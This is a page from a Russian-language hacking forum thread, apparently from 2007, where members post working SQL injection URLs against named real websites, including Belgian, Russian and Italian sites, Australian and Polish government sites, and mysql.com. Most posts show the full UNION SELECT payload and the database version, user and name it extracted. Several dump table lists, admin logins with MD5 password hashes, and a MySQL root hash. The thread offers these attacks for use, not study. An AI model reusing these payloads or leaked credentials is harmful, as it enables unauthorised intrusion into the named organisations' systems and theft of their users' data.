HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 396 из 1604 « Первая < 296346386 392 393 394 395 396 397 398 399 400 4064464968961396 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3951  
Старый 03.12.2007, 14:48
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию
PR:5

Код:
http://www.lesmuseesenwallonie.be/html/musee.php?id=-254+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(58),user(),version(),database()),25/*

mew@localhost:4.1.20:mew


PR:5
Код:
http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,concat_ws(char(58),user(),version(),database()),3/*
jeugdrodekruisbe@217.19.238.181:5.0.27:jeugdrodekr uisbe


Код:
http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,count(table_name),3+from+information_schema.tables/*
count = 72 =(
Код:
tblMail
g2_User
...


PR:3
Код:
http://www.arriere-scene.be/saison_details.php?ID=-222+union+select+1,2,3,4,5,6,concat_ws(char(58),user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
arrieres@10.0.75.67:4.0.25-standard-log:arrieres
 
Ответить с цитированием

  #3952  
Старый 04.12.2007, 00:48
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
http://www.spbreligion.ru/news.php?id=-1'+union+select+1,2,3,concat_ws(0x2F,cast(version( )+as+binary),cast(database()+as+binary),cast(user( )+as+binary)),5,6,7,8,9,10/*

4.1.15/spbreligion/root@localhost
-------------------------------------------------------------------------

http://www.portal-ug.ru/news/?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

4.1.20-lk-log/portugru_new/portugru_new@localhost
-------------------------------------------------------------------------

http://www.finnews.ru/cur_new.php?idnws=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.45-log/u13279/u13279@10.10.223.217
-------------------------------------------------------------------------

http://www.vi1.ru/index.php?id=1&news=-4+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,1/*

4.1.20/vb1ru/fyG6ds9@localhost
 
Ответить с цитированием

  #3953  
Старый 04.12.2007, 01:15
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию
Хотел купить новый доктор мартинс и наткнулся :
Код:
http://www.shoes.ru/index.php?akus=4&id=-111+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,login,pwd),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
там еще есть форум пхпбб, но не префикс не смог подобрать, удачи
 
Ответить с цитированием

  #3954  
Старый 04.12.2007, 14:37
reversys
Участник форума
Регистрация: 22.11.2007
Сообщений: 159
Провел на форуме:
732568

Репутация: 156
По умолчанию
Код:
http://www.e28.dk/Forum/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1/*
 
Ответить с цитированием

  #3955  
Старый 04.12.2007, 16:16
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
Италия

crengineering.it
Код:
http://www.crengineering.it/dettaglio.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard:crengine_cr:crengine_cr@localhost

RockLab.it
Код:
http://www.rocklab.it/dett_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/*
4.0.27-standard-log:rocklab_it:rocklab@localhost

opificium.it
Код:
http://www.opificium.it/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
5.0.27:dbopificium:josemiguel@localhost

root [ login : MySQL(pass) ] :
Код:
root : 646990a7615f4ff5
aci.it - Автомобильный Клуб Италии
Код:
http://www.aci.it/index.php?id=299&no_cahce=1&tx_ttnews[tt_news]=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*&tx_ttnews[backPid]=85&limit=0
5.0.22:aci_4051:aci405@172.24.18.10

Наши таблицы:
Код:
be_users
be_users2
fe_users
Админ [username:md5(password):email] :
Код:
l.feti : a7667861d4fd273bfb352f1dc6d319be : your@email.com
GOV

gg.gov.au
Код:
http://www.gg.gov.au/governorgeneral/content.php?id=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13/*
4.1.11-Debian_4sarge7:govgen:gg@localhost

gitd.gov.pl - типа Главная Инспекция Транспортного Движения Польши
Код:
http://www.gitd.gov.pl/witd.php?id2=-1+union+select+null,version(),null,null,null,null,null,null,null,null,null,null,null,null,null,null--
version() :
Код:
PostgreSQL 8.2.1 on i386-unknown-freebsd6.2, compiled by GCC gcc (GCC) 3.4.6 [FreeBSD] 20060305
user : gitd

119 таблиц:
Код:
http://www.gitd.gov.pl/witd.php?id2=-1+union+select+null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+INFORMATION_SCHEMA.TABLES+limit+1+offset+118--
интересные табы:
Код:
administrable_role_authorizations
pg_auth_members
pg_database
pg_user
Но данные из таблиц достать не удалось

Кто подскажет в чём трабла - [+++] !
 
Ответить с цитированием

  #3956  
Старый 04.12.2007, 20:49
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию
http://www.rrhhdigital.es/noticia_ampliada.asp?id=21541'%20or%201=@@version--
имена таблиц:
Код:
'documentacion'
'enlaces_categorias'
'enlaces'
'dtproperties'
'foro_usuarios'
'foros'
'opinion'
'foro_temas'
'entrevistas'
'foro_comentarios'
'banner_patrocinio'
'boletin_envios'
'entrevistas_boletin'
'se_rumorea'
'agenda_categorias'
'mostrar_en_boletin'
'empresa'
'foro'
'secciones'
'admin_usuarios'
'admin_secciones'
'admin_usuarios_secciones'
't_jiaozhu'
'banner_secciones'
'firmas'
'noticias'
'boletin_copia'
'boletin2'
'banner'
'boletin'
'humor'
'asesor'
'agenda'
'noticias_relaciones'
'encuesta'
'votaciones'
 
Ответить с цитированием

  #3957  
Старый 04.12.2007, 23:58
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию
бд 4
Код HTML:
http://www.eurofind.net/Articles/index.php?id=69+UNION+SELECT+1,concat(login,0x3a,password),3,4,5,6,7,8+FROM+users+LIMIT+1,1/*
Так же есть столбик ICQ но перебор уже начал )
Последний раз редактировалось KEHT33; 05.12.2007 в 03:51..
 
Ответить с цитированием

  #3958  
Старый 05.12.2007, 13:06
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
Италия

ItalienI.it - Италия Интернэшнл
Код:
http://www.italieni.it/page.php?id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),7,8,9,10,11,12/*
4.1.10-log:internazionale_italieni:inter_italieni@10.10.0 .11

Таба users
Код:
http://www.italieni.it/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password,email,admin,id),0x71),0x71),12+from+users+limit+0,1/*
 
Ответить с цитированием

  #3959  
Старый 05.12.2007, 14:21
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
www.mysql.com 0_o
Код:
http://www.mysql.com/training/venue.php?id=-MX-MexicoCity-IPCOM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,VERSION(),22,23,24,25,26,27,28,29,30,31/*
Версия - 5.1.22-rc-log
Юзер - webslave@172.16.18.103
if version=5.xx then we have access to information_schema.tables
Таблиц оч. много, но не из одной из них прочитать ничего нельзя ((
Но есть доступ к mysql.user -
Код:
http://www.mysql.com/training/venue.php?id=-MX-MexicoCity-IPCOM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(user,0x3a,password),22,23,24,25,26,27,28,29,30,31+from+mysql.user/*
p.s.Юбилейный пост в теме =)
p.s.s.Уже не юбилейный =(
Последний раз редактировалось 0nep@t0p; 07.12.2007 в 12:50..
 
Ответить с цитированием

  #3960  
Старый 05.12.2007, 15:16
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
www.sportnet.ee
Код:
http://www.sportnet.ee/index.php?id=12402&news_id=999999999)+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&light=
4.1.15


www.gg.gov.au
Код:
http://www.gg.gov.au/governorgeneral/content.php?id=26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
GIT. ГАЛАКТИКА ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ
www.galaxyit.ru
Код:
http://www.galaxyit.ru/safe-systems/article_full.php?id=-1+union+select+1,2,version(),4,5,6,7,8+--+
4.1.22-standard

Раскручивать не пробовал, ибо соксы тупят (
Последний раз редактировалось ZAMUT; 05.12.2007 в 16:36..
 
Ответить с цитированием
Ответ
Страница 396 из 1604 « Первая < 296346386 392 393 394 395 396 397 398 399 400 4064464968961396 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ